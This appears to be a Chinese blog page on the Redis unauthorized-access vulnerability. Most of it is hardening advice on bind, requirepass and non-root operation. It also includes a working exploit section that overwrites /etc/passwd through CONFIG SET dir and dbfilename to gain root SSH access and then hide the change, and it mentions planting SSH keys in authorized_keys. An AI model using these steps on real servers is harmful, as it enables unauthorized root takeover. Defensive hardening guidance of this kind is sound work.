Redis没有实现访问控制这个功能,但是它提供了一个轻量级的认证方式,可以编辑redis.conf配置来启用认证。
*Redis 未授权访问漏洞,Redis设置认证密码加固建议
防止这个漏洞需要修复以下三处问题 第一: 修改redis绑定的IP 如果只在本机使用redis服务那么只要绑定127.0.0.1
如果其他主机需要访问redis服务那么只绑定客户主机所在网络的接口 最好不要绑定0.0.0.0
另外需要通过主机内置的防火墙如iptables,或者其他外置防火墙禁止非业务主机访问redis服务 第二: 设置访问密码 在
redis.conf 中找到“requirepass”字段,取消注释并在后面填上你需要的密码。
注:修改redis的配置需要重启redis才能生效。 第三:
使用普通用户启动redis,并且禁止该用户启动shell,禁止使用root用户启动redis。
漏洞描述
redis端口对外开放并且没有配置认证选项,并且以root权限运行,未授权用户可直接覆盖/root/.ssh/authorized_keys
上传公钥直接用root账号登陆ssh服务器。
漏洞修复解决:redis 设置认证密码
为redis设置密码:设置客户端连接后进行任何其他指定前需要实用的密码。警告:因为redis速度非常快,所以在一台较好的服务器下,一个外部用户可以在一秒钟进行150k次的密码尝试,这意味着你需要指定非常非常强大的密码来防止暴力破解。
1、初始化Redis密码:
在配置文件中有个参数: requirepass 这个就是配置redis访问密码的参数;
vim redis.conf --找到下面这行,把注释去掉,requirepass后面填写需要修改的密码
requirepass mypassword1234
(Ps:需重启Redis才能生效)
redis的查询速度是非常快的,外部用户一秒内可以尝试多大150K个密码;所以密码要尽量长(对于DBA 没有必要必须记住密码);
2、不重启Redis设置密码:
在配置文件中配置requirepass的密码(当redis重启时密码依然有效)。
redis 127.0.0.1:6379> config set requirepass mypassword1234
查询密码:
redis 127.0.0.1:6379> config get requirepass
(error) ERR operation not permitted
密码验证:
redis 127.0.0.1:6379> auth mypassword1234
OK
再次查询:
redis 127.0.0.1:6379> config get requirepass
1) "requirepass"
2) "mypassword1234"
PS:如果配置文件中没添加密码 那么redis重启后,密码失效;
3、登陆有密码的Redis:
在登录的时候的时候输入密码:
redis-cli -p 6379 -a mypassword1234
先登陆后验证:
redis-cli -p 6379
redis 127.0.0.1:6379> auth mypassword1234
OK
AUTH命令跟其他redis命令一样,是没有加密的;阻止不了攻击者在网络上窃取你的密码;
认证层的目标是提供多一层的保护。如果防火墙或者用来保护redis的系统防御外部攻击失败的话,外部用户如果没有通过密码认证还是无法访问redis的。
4、redis安全认证
redis默认开启了保护模式,只允许本地环回地址登录并访问数据库
1、bind:指定ip地址进行监听
[root@redis ~]# vim /opt/redis_cluser/redis_6379/conf/redis_6379.conf
bind 172.16.210.53
2、增加requirepass{password}
[root@redis ~]# vim /opt/redis_cluser/redis_6379/conf/redis_6379.conf
requirepass 123456
3、重启redis
[root@redis ~]# redis-cli -h db01 shutdown
[root@redis ~]# redis-server /opt/redis_cluser/redis_6379/conf/redis_6379.conf
4、测试
[root@redis ~]# redis-cli -h db01
db01:6379> set k1 v1 ##插入一条数据
(error) NOAUTH Authentication required. ##提示插入失败
db01:6379> AUTH 123456 ##输入密码
OK
db01:6379> set k1 v1 ##再次插入
OK ##插入成功
5、redis未授权访问写/etc/passwd
前提条件
redis以root身份运行
目标系统允许root用户远程登录
原理
若/etc/passwd和/etc/shadow中同时存在密码,系统会使用/etc/passwd中的密码进行验证
/etc/passwd-是/etc/passwd的备份,成功登录系统后,通过替换/etc/passwd-文件,可以恢复root用户的原密码
利用过程
1、首先生成一串密码为YourNewPasswd%1024的密文
root@kali:~# python -c 'import crypt; print crypt.crypt("YourNewPasswd%1024","$6$my0salt0")'
$6$my0salt0$yCCi..OsWo8n5MaBFytGaZ0qTcHErSaoyvAVvMXFEnwgMOtpm6sYbtwUR4I.GA7Kt0X0KruYifS6c9.FkDN53.
2、接下来写入/etc/passwd
redis-cli -h 192.168.80.147
config set dir /etc/
config set dbfilename passwd
SET abcd "\n\n root:$6$my0salt0$yCCi..OsWo8n5MaBFytGaZ0qTcHErSaoyvAVvMXFEnwgMOtpm6sYbtwUR4I.GA7Kt0X0KruYifS6c9.FkDN53.:0:0:root:/root:/bin/bash\nsshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin\n\n"
save
3、写入完成后,使用root/YourNewPasswd%1024可成功连接ssh
4、最后再替换下/etc/passwd-,就又恢复成root用户的原密码了
[root@localhost ~]# cp /etc/passwd- /etc/passwd
常用命令:
2、重启redis
ps -ef |grep redis --查看redis进程
kill -9 13224 --**杀死redis进程**
ps -ef |grep redis --确认杀死
./redis-server ../redis.conf --重启redis,指定配置文件
ps -ef |grep redis
root 9309 1 0 15:22 ? 00:00:00 ./redis-server *:6379
root 9727 8627 0 15:28 pts/1 00:00:00 grep redis
/redis-cli -h 127.0.0.1 -p 6379 --不用密码登录测试
127.0.0.1:6379> keys *
(error) NOAUTH Authentication required. --拒绝操作
./redis-cli -h 127.0.0.1 -p 6379 -a aop_redis@68 --加-a用密码登录
127.0.0.1:6379> select 1
OK --修复成功
redis未授权访问利用
redis未授权访问修复
1、配置bind选项,限定可以连接Redis服务器的IP,修改Redis的默认端口6379
2、配置认证,设置requirepass参数
- 生成密钥
- 利用redis上传公钥
- 利用密钥比对登录系统
#ssh-keygen -t rsa
#cat /root/.ssh/id_rsa
#
ssh.config配置文件
参考链接 :
redis安全认证 :https://www.jianshu.com/p/115beb211062
Redis 远程链接报错(error) DENIED Redis is running 需配置如下 :https://www.jianshu.com/p/5c9e598ff4c8
redis设置密码以及加固建议 :https://www.jianshu.com/p/9a7be5a35c71